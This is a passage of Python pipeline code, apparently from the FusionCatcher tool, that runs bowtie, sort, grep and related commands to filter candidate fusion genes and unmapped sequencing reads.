ainput[:] for i in xrange(len(title)): ain = ainput.replace("___0.txt","___%s.txt" % (i,)) aout = ainput.replace("___0.txt","___%s.txt" % (i+1,)) job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',ain,kind='input',temp_path=temp_flag) job.add('--label',title[i],kind='parameter') if thres and thres != '0': job.add('--filter_gene_pairs_threshold',thres[i],kind='parameter') job.add('--filter_gene_pairs',files[i],kind='output') job.add('--output_fusion_genes',aout,kind='output') job.run() job.link(aout, outdir('candidate_fusion-genes_custom___last.txt'), temp_path = temp_flag) else: job.link(last_candidate_file, outdir('candidate_fusion-genes_custom___last.txt'), temp_path = temp_flag) # label fusion genes -- banned job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_custom___last.txt'),kind='input',temp_path=temp_flag) job.add('--label','tcga-oesophagus',kind='parameter') job.add('--filter_gene_pairs',datadir('oesophagus.txt'),kind='output') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_last.txt'),kind='output') job.run() ############################################################################## # FILTER FUSION GENES ############################################################################## spk = spanning_pairs_minimum - 2 if spk < 1: spk = 1 # extract the relevant fusion genes from the found list for further analysis job.add(_FC_+'extract_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_last.txt'),kind='input',temp_path=temp_flag) job.add('--input_fusion_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input') job.add('--threshold_pairs',spanning_pairs_minimum,kind='parameter') # considers only the fusion genes candidates with more than 3 paired-end reads job.add('--threshold_pairs_known',spk,kind='parameter') # considers only the fusion genes candidates with more than 3 paired-end reads job.add('--threshold_count',options.spanning_pairs_count,kind='parameter') if options.biotypes_more: job.add('--skip_labels',options.biotypes+','+options.biotypes_more,kind='parameter') # skips the fusion genes candidates which are labeled else: job.add('--skip_labels',options.biotypes,kind='parameter') # skips the fusion genes candidates which are labeled if not options.skip_known_fusions: job.add('--allowed_labels','known,cosmic,ticdb,cgp',kind='parameter') # it allows the known fusions to be considered for further analysis if options.focus_fusions: job.add('--further_labels','focus',kind='parameter') # it allows the focus fusion genes to pass even when they are under the threshold job.add('--output',outdir('candidate_fusion-genes_exon-exon.txt'),kind='output') job.add('--output_fusion',outdir('candidate_fusion-genes_further.txt'),kind='output') job.add('--output_fusion_reads',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-F',kind='parameter') job.add('-f',datadir('custom_genes_mark.txt'),kind='input') job.add('',outdir('candidate_fusion-genes_further.txt'),kind='input') job.add('>',outdir('candidate_fusion-genes_further_mark.txt'),kind='output') job.run(successful_exit_status=(0,1)) job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-F',kind='parameter') #job.add('-f',datadir('ig_loci.txt'),kind='input') job.add('-f',datadir('gap_fusions.txt'),kind='input') job.add('',outdir('candidate_fusion-genes_further.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('grep',kind='parameter') job.add('"known"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('grep',kind='parameter') job.add('"further_analysis"',kind='parameter') job.add('>',outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'),kind='output') job.run(successful_exit_status=(0,1)) eporcrlf2igh = False if job.iff( organism == 'homo_sapiens' and max_len_reads > 74 and (not empty(outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'))), id ="#candidate_fusion-genes_further_eporcrlf2igh#"): eporcrlf2igh = True job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1,2',kind='parameter') job.add('',outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') job.add('>',outdir('eporcrlf2_temp.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('comm',kind='parameter') job.add('-23',kind='parameter') job.add('',outdir('eporcrlf2_temp.txt'),kind='input',temp_path='yes') #job.add('',datadir('ig_loci.txt'),kind='input') job.add('',datadir('gap_fusions.txt'),kind='input') job.add('>',outdir('eporcrlf2.txt'),kind='output') job.run() # save preliminary list of candidate fusion genes job.add(_FC_+'add_ambiguous_counts.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_further.txt'),kind='input') job.add('--input_ambiguous',outdir('all_ambiguous_genes.txt'),kind='input') job.add('--output',outdir('preliminary-list_candidate-fusion-genes.txt'),kind='output') job.run() candidates = True if job.iff(empty(outdir('candidate_fusion-genes_exon-exon.txt')) , id = "#no-candidate-fusion-genes-found-1#"): # or empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq') candidates = False t = ["="*80, "WARNING: No candidate fusion genes have been found (due to no paired-reads", " being found which support any possible fusion gene)!", "="*80 ] job.write(t, stderr=True) if job.run(): file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]]) # if (not candidates) and (not options.keep_viruses): # t = ["="*80, # "WARNING: Viruses statistics and filtering has been skipped due to no fusions beeing found!", # " If one wants to have even in cases when no fusion genes are found then always ", # " (re)run FusionCatcher using '--keep-viruses-alignments' command line option!", # "="*80 # ] # job.write(t, stderr=True) # if job.run(): # file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]]) # summary the exon-exon mappings # just get the header job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE.txt'), kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE.zip'), kind='output') job.run() # job.clean(outdir('reads_filtered_transcriptome_sorted-read.map'),temp_path=temp_flag) job.clean(outdir('original.fq.gz'),temp_path=temp_flag) #job.clean(outdir('originala.fq.gz'),temp_path=temp_flag if options.skip_spotlight else 'no') #job.clean(outdir('candidate_fusion-genes_missing_mates.txt'),temp_path=temp_flag) #job.clean(outdir('candidate_fusion-genes_supporting_paired-reads.txt'),temp_path=temp_flag if options.skip_spotlight else 'no') #job.clean(outdir('candidate_fusion-genes_exon-exon.txt')) #if candidates or options.keep_viruses: # this has been removed in order to get always the viruses statistics if options.skip_viruses_filtering and (not options.keep_viruses) and (not candidates): t = ["="*80, "WARNING: Viruses statistics and filtering has been skipped due to no fusions ", " being found and use of command line option '--skip-vir'!", "="*80 ] job.write(t, stderr=True) if job.run(): file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]]) ############################################################################## # FIND EXON-EXON JUNCTION IN FUSION GENES ############################################################################## if job.iff(not empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq')), id = "#no-candidate-fusion-genes-found-1A#"): if not options.skip_unmapped_pairs_filtering: job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('paste','- - - -',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add(_FC_+'droppe.py',kind='parameter') job.add('-i','-',kind='input') if options.trim_3end_keep2 != 0: job.add('-k',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'),kind='input') job.add('-f',info_file,kind='parameter',checksum='no') job.add('-o','-',kind='output') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'),kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'), temp_path=temp_flag) # # FIND the FUSION POINT # if options.mismatches < 2: # stjude # before was 3 ############################################################################## # FILTER the unmapped reads ############################################################################## # map on transcriptome again job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v','2',kind='parameter') #options.mismatches # stjude # before was 3 job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-m','1',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_more.fq'),kind='output') # here is the result job.add('--max',outdir('reads_filtered_not-mapped_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads-unmapped-filtered-trans.map'),kind='output') job.add('2>',outdir('log_bowtie_reads-unmapped-filtered-out-transcriptome.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') # XXX #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort job.add('-t',"'\t'",kind='parameter') job.add('-k','1,1',kind='parameter') #job.add('',outdir('reads-unmapped-filtered-trans.map'),kind='input',temp_path = temp_flag) job.add('>',outdir('reads-unmapped-filtered-trans.sorted.map'),kind='output') job.run() info(job, fromfile = outdir('log_bowtie_reads-unmapped-filtered-out-transcriptome.stdout.txt'), tofile = info_file, top = ["Mapping all reads (which do not map on genome and do not map on transcriptome) on transcriptome for filtering purposes:", "-----------------------------------------------------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) if job.iff( not empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_more.fq')), id = "#reads_filtered_not-mapped-genome_not-mapped-transcriptome_more.fq-empty#"): job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort job.add('-t',"'\t'",kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-m',kind='parameter') job.add('',outdir('reads-unmapped-filtered-trans.sorted.map'),kind='input',temp_path = temp_flag) job.add('',outdir('reads_filtered_transcriptome_sorted-read.map'),kind='input',temp_path = temp_flag) # job.add('-',kind='parameter') job.add('>',outdir('reads_filtered_transcriptome_sorted-read_end.map'),kind='output') job.run() # map on genome again job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','200',kind='parameter') job.add('-v','0',kind='parameter') #options.mismatches # stjude # it was 3 before job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-m','20',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') # job.add('--suppress','1,2,3,4,5,6,7,8',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end.fq'),kind='output') # here is the result job.add('--max',outdir('reads_filtered_not-mapped_multiple_end.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if bowtie123: job.add('',datadir('genome_index2/index'),kind='input') else: if os.path.isfile(datadir('genome_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('genome_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_more.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads-unmapped-filtered-geno.map'),kind='output',temp_path=temp_flag) # job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_bowtie_reads-unmapped-filtered-out-genome.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() job.clean(outdir('log_bowtie_reads-unmapped-filtered-out-genome.stdout.txt'),temp_path=temp_flag) else: job.clean(outdir('reads-unmapped-filtered-trans.sorted.map'),temp_path=temp_flag) job.link(outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_end.map'), temp_path = temp_flag) job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end.fq'), temp_path = temp_flag, kind = 'soft') else: job.link(outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_end.map'), temp_path = temp_flag) job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end.fq'), temp_path = temp_flag, kind = 'soft') # filter out the reads with poly tail # trim the poly tails job.add(_FC_+'trim_poly_tails.py',kind='program') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end.fq'),kind='input',temp_path=temp_flag) job.add('--repeats',length_anchor_minimum - 1,kind='parameter') # 12 #job.add('--skip_reads',kind='parameter') job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2b.fq'),kind='output') job.run() # clip the low quality ends job.add(_FC_+'clip_quality.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('-t',options.trim_quality,kind='parameter') # below Q5 trimming starts job.add('--score-type','sanger',kind='parameter') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2b.fq'),kind='input',temp_path=temp_flag) job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2.fq'),kind='output') job.run() # remove reads shorter than a given threshold # job.add('remove_shorter_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2.fq'),kind='input',temp_path=temp_flag) # job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f3.fq'),kind='output') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f3.fq'),kind='output') job.run() if options.filter_str: # remove STR reads job.add(_FC_+'remove_str.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--threshold',options.filter_str,kind='parameter',checksum='no') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f3.fq'),kind='input',temp_path = temp_flag) job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'),kind='output') # job.add('--str',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-str.fq'),kind='output',temp_path = temp_flag) job.add('--log',outdir('log_reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-str.txt'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('log_reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-str.txt'),kind='input',temp_path = temp_flag) job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f3.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'), temp_path=temp_flag) # remove the reads which map on viruses genomes downloaded from NCBI if not options.skip_viruses_filtering: if options.keep_viruses: # convert the quality scores to Illumina Solexa version 1.5 format job.add(_FC_+'phred.py',kind='program') job.add('--link','soft',kind='parameter') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'),kind='input') job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-sam.fq'),kind='output') job.add('--input_type','auto-detect',kind='parameter') job.add('--output_type','sanger',kind='parameter') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-v',options.filter_mismatches,kind='parameter') #options.mismatches #job.add('-v','0',kind='parameter') job.add('--seedmms','0',kind='parameter') # options.mismatches job.add('--seedlen',options.trim_3end_keep,kind='parameter') job.add('--trim5','7',kind='parameter') # trim the 10 job.add('-p',options.processes,kind='parameter',checksum='no') #job.add('-m','1',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--sam',kind='parameter') #job.add('--tryhard',kind='parameter') #job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') # if len_reads > 40 and options.trim_wiggle: # job.add('--trim3',options.trim_wiggle,kind='parameter') # trim on the fly 5bp from 3' end # job.add('--trim5',options.trim_wiggle,kind='parameter') # trim the 5 if os.path.isfile(datadir('viruses_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('viruses_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-sam.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads-mapped-on-viruses.sam'),kind='output') job.add('2>',outdir('log_sam-viruses.stdout.txt'),kind='output',checksum='no') job.add('|',kind='parameter') if not bowtie121: job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') job.add('>',outdir('reads-mapped-on-viruses.sam.gz'),kind='output') job.run() info(job, fromfile = outdir('log_sam-viruses.stdout.txt'), tofile = info_file, top = ["Mapping all reads on viruses/bacteria genomes in order to generate SAM file:", "----------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) # remove unmapped reads #samtools view -hS -F 4 mapped_unmapped.sam > mapped_only.sam job.add('printf',kind='program') job.add(('"\n\nMapping all input reads on viruses genomes database for filtering purposes:\n'+ '--------------------------------------------------------------------------------\n"'),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') #job.add('-v',options.filter_mismatches,kind='parameter') #options.mismatches #job.add('-v','0',kind='parameter') #options.mismatches job.add('--seedmms','0',kind='parameter') # options.mismatches job.add('--seedlen',options.trim_3end_keep,kind='parameter') job.add('--trim5','7',kind='parameter') # trim the 10 job.add('-p',options.processes,kind='parameter',checksum='no') #job.add('-m','1',kind='parameter') job.add('-k','1',kind='parameter') #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--tryhard',kind='parameter') #job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') # if len_reads > 40 and options.trim_wiggle: # job.add('--trim3',options.trim_wiggle,kind='parameter') # trim on the fly 5bp from 3' end # job.add('--trim5',options.trim_wiggle,kind='parameter') # trim the 5 job.add('--suppress','1,2,4,5,6,7,8',kind='parameter') # originally was: '2,3,4,5,6,7,8' job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f5.fq'),kind='output') # here is the result job.add('--max',outdir('reads-filtered_temp_multiple-viruses.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('viruses_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('viruses_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads-filtered-viruses.map'),kind='output') # XXX job.add('2>>',info_file,kind='parameter',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('',outdir('reads-filtered-viruses.map'),kind='input',temp_path=temp_flag) # XXX job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('-c',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-rn',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('viruses_bacteria_temp.txt'),kind='output') job.run() info(job, fromfile = outdir('viruses_bacteria_temp.txt'), tofile = info_file, top = ["","","", "Viruses found to have reads mapped on their genomes:", "----------------------------------------------------", "Reads_count\tOrganism"], bottom = "\n\n\n") job.add('printf',kind='program') job.add('"Counts_of_mapping_reads\tVirus/Bacteria/Phage\n"', kind='parameter') job.add('>',outdir('viruses_bacteria_header.txt'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('viruses_bacteria_header.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('viruses_bacteria_temp.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('viruses_bacteria_phages.txt'),kind='output') job.run() # job.add('printf',kind='program') # job.add(('"\n\n\nViruses found to have reads mapped on their genomes:\n'+ # '---------------------------------------------------------\n'+ # 'Reads_count\tOrganism\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('viruses_statistics.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() else: job.add('printf',kind='program') job.add('"Counts_of_mapping_reads\tVirus/Bacteria/Phage\n"', kind='parameter') job.add('>',outdir('viruses_bacteria_phages.txt'),kind='output') job.run() job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f5.fq'), temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f5.fq')), id="#no-candidate-fusion-genes-found-t5#"): pass else: # filter -- map on genome again the trimmed reads with 11 bp from 3' end job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') # job.add('-a',kind='parameter') job.add('-v','0',kind='parameter') #options.mismatches job.add('-p',options.processes,kind='parameter',checksum='no') # job.add('-m','1',kind='parameter') job.add('-k','10',kind='parameter') job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') # job.add('--strata',kind='parameter') if len_reads > 40: job.add('--trim5', length_anchor_minimum - 7, kind='parameter') # trim 11 bp on the fly else: job.add('--trim5', length_anchor_minimum - 9, kind='parameter') # trim 11 bp on the fly # job.add('--suppress','1,2,3,4,5,6,7,8',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='output') # here is the result job.add('--max',outdir('reads_filtered_not-mapped_multiple_end2.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if bowtie123: job.add('',datadir('genome_index2/index'),kind='input') else: if os.path.isfile(datadir('genome_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('genome_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f5.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads-unmapped-filtered-geno_last.map'),kind='output',temp_path=temp_flag) # job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_bowtie_reads-unmapped-filtered-out-genome_last.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads-unmapped-filtered-out-genome_last.stdout.txt'), tofile = info_file, top = ["Mapping all trimmed unmapped reads again on genome for filtering purposes:", "-------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) # job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end2.fq'), # outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'), # temp_path=temp_flag) # # filter -- map on genome again the trimmed reads with 11 bp from 5' end # job.add('bowtie',kind='program') # job.add('-t',kind='parameter') # job.add('-q',kind='parameter') ## job.add('-a',kind='parameter') # job.add('-v','1',kind='parameter') #options.mismatches # job.add('-p',options.processes,kind='parameter',checksum='no') ## job.add('-m','1',kind='parameter') # job.add('--tryhard',kind='parameter') # job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') ## job.add('--best',kind='parameter') ## job.add('--strata',kind='parameter') # job.add('--trim3','13',kind='parameter') # trim 11 bp on the fly # job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') # job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='output') # here is the result # job.add('--max',outdir('reads_filtered_not-mapped_multiple_final.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' # job.add('',datadir('genome_index/'),kind='input') # job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end2.fq'),kind='input',temp_path=temp_flag) # job.add('',outdir('reads-unmapped-filtered-geno_last.map'),kind='output',temp_path=temp_flag) # job.add('>',outdir('log_bowtie_reads-unmapped-filtered-out-genome_last.stdout.txt'),kind='parameter',checksum='no') # job.add('2>&1',kind='parameter',checksum='no') # job.run() double_bowtie = False if max_len_reads > min_len_reads: double_bowtie = True if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq')), id="#no-candidate-fusion-genes-found-2#"): if candidates and (not double_bowtie): t = ["="*80, "WARNING: No candidate fusion genes have been found (no unmapped reads found and reads are not long enough either)!", "="*80 ] job.write(t, stderr=True) if job.run(): file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]]) # summary the exon-exon mappings # just get the header job.add(_FC_+'build_report_fusions_map.py',kind='program') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE.txt'), kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE.zip'), kind='output') job.run() if options.keep_unmapped_reads: # job.add('echo',kind='program') # job.add('-n','""',kind='parameter') # job.add('',outdir('unmapped-reads.fq.gz'), kind='output') # job.run() job.add('touch',kind='program') job.add('',outdir('unmapped-reads.fq.gz'), kind='output') job.run() candidates = False job.clean(outdir('reads_filtered_transcriptome_sorted-read_end.map'),temp_path='no' if double_bowtie and not candidates else temp_flag) # #job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'), # outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq') # ) elif (not candidates) and options.keep_unmapped_reads: # convert FASTQ illumina to sanger # job.add('seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-Q64',kind='parameter') # job.add('-V',kind='parameter') # job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag) #job.add('>',outdir('unmapped-reads.fq'),kind='output') #job.run() #job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='program') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') 